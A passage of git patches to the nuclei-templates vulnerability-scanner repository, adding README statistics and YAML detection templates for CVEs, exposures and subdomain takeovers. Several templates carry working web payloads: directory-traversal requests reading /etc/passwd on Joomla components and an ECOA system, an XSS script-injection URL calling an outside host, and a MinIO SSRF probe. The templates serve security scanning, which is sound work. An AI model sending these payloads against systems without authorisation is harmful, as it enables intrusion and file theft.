panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | -| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | From 403f152e0047d765a3a3fe5e0e580c5a6954a65e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 Sep 2021 20:34:38 +0000 Subject: [PATCH 2241/4083] Auto Update README [Mon Sep 13 20:34:38 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 5487e31afc..89a5851073 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | -| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | -**150 directories, 2015 files**. +**164 directories, 2063 files**. From 83795af535ff95f71833a28720dd0c110ecd6c7c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 14 Sep 2021 05:11:22 +0700 Subject: [PATCH 2242/4083] Create CVE-2010-1952.yaml --- cves/2010/CVE-2010-1952.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1952.yaml diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml new file mode 100644 index 0000000000..5e71f4a39f --- /dev/null +++ b/cves/2010/CVE-2010-1952.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1952 + +info: + name: Joomla! Component BeeHeard 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12239 + - https://www.cvedetails.com/cve/CVE-2010-1952 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From c38efae94085677bd4415c52f313e7c168341506 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 14 Sep 2021 05:24:38 +0700 Subject: [PATCH 2243/4083] Create CVE-2010-1352.yaml --- cves/2010/CVE-2010-1352.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1352.yaml diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml new file mode 100644 index 0000000000..5dd77fa70f --- /dev/null +++ b/cves/2010/CVE-2010-1352.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1352 + +info: + name: Joomla! Component Juke Box 1.7 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12084 + - https://www.cvedetails.com/cve/CVE-2010-1352 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 598eaf62d66eabb98389136354e5f7626abc271e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 14 Sep 2021 05:33:49 +0700 Subject: [PATCH 2244/4083] Create CVE-2014-9444.yaml --- cves/2014/CVE-2014-9444.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2014/CVE-2014-9444.yaml diff --git a/cves/2014/CVE-2014-9444.yaml b/cves/2014/CVE-2014-9444.yaml new file mode 100644 index 0000000000..ee9101bfe7 --- /dev/null +++ b/cves/2014/CVE-2014-9444.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-9444 + +info: + name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 + - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' part: body - type: word From 21080b7d7d9335e436e4b7a201173ae8b3207bc9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 15:10:16 +0530 Subject: [PATCH 2248/4083] Update pagewiz-takeover.yaml --- takeovers/pagewiz-takeover.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/takeovers/pagewiz-takeover.yaml b/takeovers/pagewiz-takeover.yaml index 7984ec3011..e733d7dd6d 100644 --- a/takeovers/pagewiz-takeover.yaml +++ b/takeovers/pagewiz-takeover.yaml @@ -4,6 +4,7 @@ info: name: Pagewiz subdomain takeover author: brabbit10 severity: high + reference: https://www.pagewiz.com/ tags: takeover requests: From f22ee2dd999ce971b9a9dbef2555664bae8efac6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 15:40:52 +0530 Subject: [PATCH 2249/4083] Update pagewiz-takeover.yaml --- takeovers/pagewiz-takeover.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/takeovers/pagewiz-takeover.yaml b/takeovers/pagewiz-takeover.yaml index e733d7dd6d..07b8208fb8 100644 --- a/takeovers/pagewiz-takeover.yaml +++ b/takeovers/pagewiz-takeover.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: @@ -19,3 +20,7 @@ requests: - 'Start Your New Landing Page Now!' - 'pagewiz' condition: and + + - type: status + status: + - 200 From 4b1bca299d7beb8c5aff228a9b0e7b536877840b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 14 Sep 2021 17:31:27 +0700 Subject: [PATCH 2250/4083] Create CVE-2021-21287.yaml --- cves/2021/CVE-2021-21287.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-21287.yaml diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml new file mode 100644 index 0000000000..1cc1953f08 --- /dev/null +++ b/cves/2021/CVE-2021-21287.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-21287 + +info: + name: MinIO Browser API SSRF + author: pikpikcu + severity: high + description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. + reference: | + - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 + - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q + tags: cve,cve2021,minio,ssrf,oob + +requests: + - method: POST + path: + - '{{BaseURL}}/minio/webrpc' + body: | + {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + headers: + Host: {{interactsh-url}} + Content-Type: application/json + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" # Confirms the HTTP Interaction From ede2e49751e727673302214403e83d1e272b6eff Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 16:52:28 +0530 Subject: [PATCH 2251/4083] Update CVE-2021-21287.yaml --- cves/2021/CVE-2021-21287.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 1cc1953f08..2d801cbdd7 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. - reference: | + reference: - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q @@ -17,9 +17,11 @@ requests: - '{{BaseURL}}/minio/webrpc' body: | {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + headers: Host: {{interactsh-url}} Content-Type: application/json + User-Agent: Mozilla/5.0 matchers: - type: word From d38052f05a8b6d00d0508af3af35102cdbcb3870 Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Tue, 14 Sep 2021 14:26:36 +0300 Subject: [PATCH 2252/4083] Improve AWS Elasticbeanstalk Improve AWS Elasticbeanstalk with a better matcher to prevent high-severity alerts on non-hijackable domains and add an extractor for better usage. --- dns/elasticbeantalk-takeover-detection.yaml | 25 +++++++++++++++++---- 1 file changed, 21 insertions(+), 4 deletions(-) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover-detection.yaml index a4b596bf90..c5dfc13a46 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover-detection.yaml @@ -5,11 +5,20 @@ info: author: philippedelteil severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 tags: dns,takeover,aws +# You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. +# Do not report this without claiming the CNAME. +# +# CLI command to verify the availability of the environment: +# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} +# Example: +# CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com +# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + dns: - name: "{{FQDN}}" type: A @@ -18,9 +27,17 @@ dns: retries: 3 matchers-condition: and matchers: - - type: word - words: - - "elasticbeanstalk" + - type: regex + name: elasticbeanstalk + regex: + # Only CNAMEs with region specification are hijackable. + - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com + condition: or - type: word words: - "NXDOMAIN" + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" From 81fbbf028054b7dc608dfb09b0fd79c7555fdb7f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 16:59:42 +0530 Subject: [PATCH 2253/4083] Update elasticbeantalk-takeover-detection.yaml --- dns/elasticbeantalk-takeover-detection.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover-detection.yaml index c5dfc13a46..79aa08e653 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover-detection.yaml @@ -14,10 +14,10 @@ info: # Do not report this without claiming the CNAME. # # CLI command to verify the availability of the environment: -# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} +# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} # Example: # CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com -# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c +# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c dns: - name: "{{FQDN}}" @@ -25,17 +25,21 @@ dns: class: inet recursion: true retries: 3 + matchers-condition: and matchers: + - type: regex name: elasticbeanstalk regex: # Only CNAMEs with region specification are hijackable. - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com condition: or + - type: word words: - "NXDOMAIN" + extractors: - type: regex group: 1 From fbc810b9a73b5bc124a798c05e3b726c08cbea00 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 17:50:57 +0530 Subject: [PATCH 2254/4083] misc update --- ...ion.yaml => elasticbeantalk-takeover.yaml} | 28 +++++++++---------- 1 file changed, 13 insertions(+), 15 deletions(-) rename dns/{elasticbeantalk-takeover-detection.yaml => elasticbeantalk-takeover.yaml} (51%) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover.yaml similarity index 51% rename from dns/elasticbeantalk-takeover-detection.yaml rename to dns/elasticbeantalk-takeover.yaml index 79aa08e653..8a06147859 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover.yaml @@ -1,23 +1,24 @@ -id: elasticbeantalk-takeover-detection +id: elasticbeantalk-takeover info: - name: Elastic BeanTalk takeover detection - author: philippedelteil + name: ElasticBeanTalk takeover detection + author: philippedelteil,rotemreiss severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 tags: dns,takeover,aws - -# You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. -# Do not report this without claiming the CNAME. -# -# CLI command to verify the availability of the environment: -# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} -# Example: -# CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com -# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + additional-fields: + comments: | + Only CNAMEs with region specification are hijackable. + You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. + Do not report this without claiming the CNAME. + CLI command to verify the availability of the environment: + aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} + For example: + CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com + Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c dns: - name: "{{FQDN}}" @@ -30,11 +31,8 @@ dns: matchers: - type: regex - name: elasticbeanstalk regex: - # Only CNAMEs with region specification are hijackable. - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com - condition: or - type: word words: From 5b09b9ca113aa58610d01657582b35505f195b41 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:15:44 +0530 Subject: [PATCH 2255/4083] misc update --- cves/2021/CVE-2021-21287.yaml | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 2d801cbdd7..7f5e188f12 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -6,25 +6,27 @@ info: severity: high description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. reference: + - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q tags: cve,cve2021,minio,ssrf,oob requests: - - method: POST - path: - - '{{BaseURL}}/minio/webrpc' - body: | - {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + - raw: + - | + POST /minio/webrpc HTTP/1.1 + Host: {{interactsh-url}} + Content-Type: application/json - headers: - Host: {{interactsh-url}} - Content-Type: application/json - User-Agent: Mozilla/5.0 + {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word part: interactsh_protocol words: - - "http" # Confirms the HTTP Interaction + - "http" # Confirms the HTTP Interaction \ No newline at end of file From 84abafbcf0719f2d21780fdaaefd7bc195041228 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:20:56 +0530 Subject: [PATCH 2256/4083] Added detection template --- technologies/minio-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/minio-detect.yaml diff --git a/technologies/minio-detect.yaml b/technologies/minio-detect.yaml new file mode 100644 index 0000000000..aab5ca4231 --- /dev/null +++ b/technologies/minio-detect.yaml @@ -0,0 +1,22 @@ +id: minio-detect + +info: + name: Minio Detection + author: pdteam + severity: info + tags: tech,minio + +requests: + - method: GET + path: + - "{{BaseURL}}/minio/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "MinIO Browser" \ No newline at end of file From 6e5255514dd0e04898a266dbb4f5a772d44a8891 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:47:58 +0530 Subject: [PATCH 2257/4083] misc update --- cves/2021/CVE-2021-21287.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 7f5e188f12..030ce0d427 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -17,16 +17,18 @@ requests: POST /minio/webrpc HTTP/1.1 Host: {{interactsh-url}} Content-Type: application/json + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Length: 76 {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: interactsh_protocol words: - - "http" # Confirms the HTTP Interaction \ No newline at end of file + - "http" # Confirms the HTTP Interaction + + - type: word + words: + - "We encountered an internal error" \ No newline at end of file From d39ba8391e30abb076b4e2046a9a094f2c38e2df Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 Sep 2021 15:20:20 +0000 Subject: [PATCH 2258/4083] Auto Generated CVE annotations [Tue Sep 14 15:20:20 UTC 2021] :robot: --- cves/2021/CVE-2021-21287.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 030ce0d427..0758519bac 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -10,6 +10,11 @@ info: - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 tags: cve,cve2021,minio,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.70 + cve-id: CVE-2021-21287 + cwe-id: CWE-918 requests: - raw: From be24688a4898d1213e556235defdd52ec6317792 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 Sep 2021 21:49:36 +0530 Subject: [PATCH 2259/4083] Create error-processing.yaml --- exposures/logs/error-processing.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/logs/error-processing.yaml diff --git a/exposures/logs/error-processing.yaml b/exposures/logs/error-processing.yaml new file mode 100644 index 0000000000..77b5533fd1 --- /dev/null +++ b/exposures/logs/error-processing.yaml @@ -0,0 +1,23 @@ +id: error-processing + +info: + name: Error Occurred While Processing Request + author: dhiyaneshDK + severity: low + reference: https://www.exploit-db.com/ghdb/6115 + tags: exposures,misconfig,logs + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Error Occurred While Processing Request' + + - type: status + status: + - 500 From c22542893228361aedb32bd92b32dd87be7cf829 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 Sep 2021 22:30:18 +0530 Subject: [PATCH 2260/4083] Create struts-problem-report.yaml --- exposures/logs/struts-problem-report.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/logs/struts-problem-report.yaml diff --git a/exposures/logs/struts-problem-report.yaml b/exposures/logs/struts-problem-report.yaml new file mode 100644 index 0000000000..36ef77058f --- /dev/null +++ b/exposures/logs/struts-problem-report.yaml @@ -0,0 +1,23 @@ +id: struts-problem-report + +info: + name: Struts Problem Report + author: dhiyaneshDK + severity: low + reference: https://www.exploit-db.com/ghdb/4278 + tags: exposures,misconfig + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Struts Problem Report' + + - type: status + status: + - 200 From cb80cbb537a668aa91b4303a5a035c01a2e7cffb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 14 Sep 2021 22:46:01 +0530 Subject: [PATCH 2261/4083] Create dsm-terminator-error.yaml --- exposures/logs/dsm-terminator-error.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/logs/dsm-terminator-error.yaml diff --git a/exposures/logs/dsm-terminator-error.yaml b/exposures/logs/dsm-terminator-error.yaml new file mode 100644 index 0000000000..62ba6f94b5 --- /dev/null +++ b/exposures/logs/dsm-terminator-error.yaml @@ -0,0 +1,23 @@ +id: dsm-terminator-error + +info: + name: DSM Terminator Error + author: dhiyaneshDK + severity: low + reference: https://www.exploit-db.com/ghdb/4251 + tags: exposures,misconfig,sap + +requests: + - method: GET + path: + - '{{BaseURL}}/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator' + + matchers-condition: and + matchers: + - type: word + words: + - 'DSM Terminator [ ABORT ]' + + - type: status + status: + - 200 From 01eb1cf5596cf250f01c23a837f090fbd11fe239 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 15 Sep 2021 07:02:57 +0900 Subject: [PATCH 2262/4083] Create ecoa-building-automation-lfd.yaml --- ecoa-building-automation-lfd.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 ecoa-building-automation-lfd.yaml diff --git a/ecoa-building-automation-lfd.yaml b/ecoa-building-automation-lfd.yaml new file mode 100644 index 0000000000..f6bb6c9416 --- /dev/null +++ b/ecoa-building-automation-lfd.yaml @@ -0,0 +1,30 @@ +id: ecoa-building-automation-lfd + +info: + name: ECOA Building Automation System Local File Disclosure + author: 0x_Akoko + severity: high + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php + tags: ecoa,lfi + +requests: + - raw: + - | + POST /viewlog.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 + Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + yr=2021&mh=6&fname=../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 428be9721bf9eaa6c4688aa357ade6897fdc9c3d Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 15 Sep 2021 07:24:11 +0900 Subject: [PATCH 2263/4083] Update ecoa-building-automation-lfd.yaml --- ecoa-building-automation-lfd.yaml | 25 ++++++++----------------- 1 file changed, 8 insertions(+), 17 deletions(-) diff --git a/ecoa-building-automation-lfd.yaml b/ecoa-building-automation-lfd.yaml index f6bb6c9416..ed94547ad5 100644 --- a/ecoa-building-automation-lfd.yaml +++ b/ecoa-building-automation-lfd.yaml @@ -1,30 +1,21 @@ id: ecoa-building-automation-lfd - -info: - name: ECOA Building Automation System Local File Disclosure +info: author: 0x_Akoko + name: "ECOA Building Automation System Local File Disclosure" + reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php" severity: high - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - tags: ecoa,lfi + tags: "ecoa,lfi" requests: - raw: - | POST /viewlog.jsp HTTP/1.1 Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 - Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - - yr=2021&mh=6&fname=../../../../../../../../etc/passwd - matchers-condition: and + + yr=2021&mh=6&fname=../../../../../../../../etc/passwd + matchers: - - type: regex regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 + - "root:.*:0:0:" From 9011c7a779463d40600bc1d1ddf934f99f26b3b3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 14 Sep 2021 20:53:58 -0300 Subject: [PATCH 2264/4083] Update azure-takeover-detection.yaml This will display what type of service take over is possible. --- dns/azure-takeover-detection.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 9f966d436d..67bee6345b 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -44,3 +44,8 @@ dns: - type: word words: - "NXDOMAIN" + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" From 1aaa4203ec666f49adf10583809ef0e706d1b0e6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 15 Sep 2021 07:06:31 +0700 Subject: [PATCH 2265/4083] Create CVE-2010-1957.yaml --- cves/2010/CVE-2010-1957.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1957.yaml diff --git a/cves/2010/CVE-2010-1957.yaml b/cves/2010/CVE-2010-1957.yaml new file mode 100644 index 0000000000..7f16c277c4 --- /dev/null +++ b/cves/2010/CVE-2010-1957.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1957 + +info: + name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read 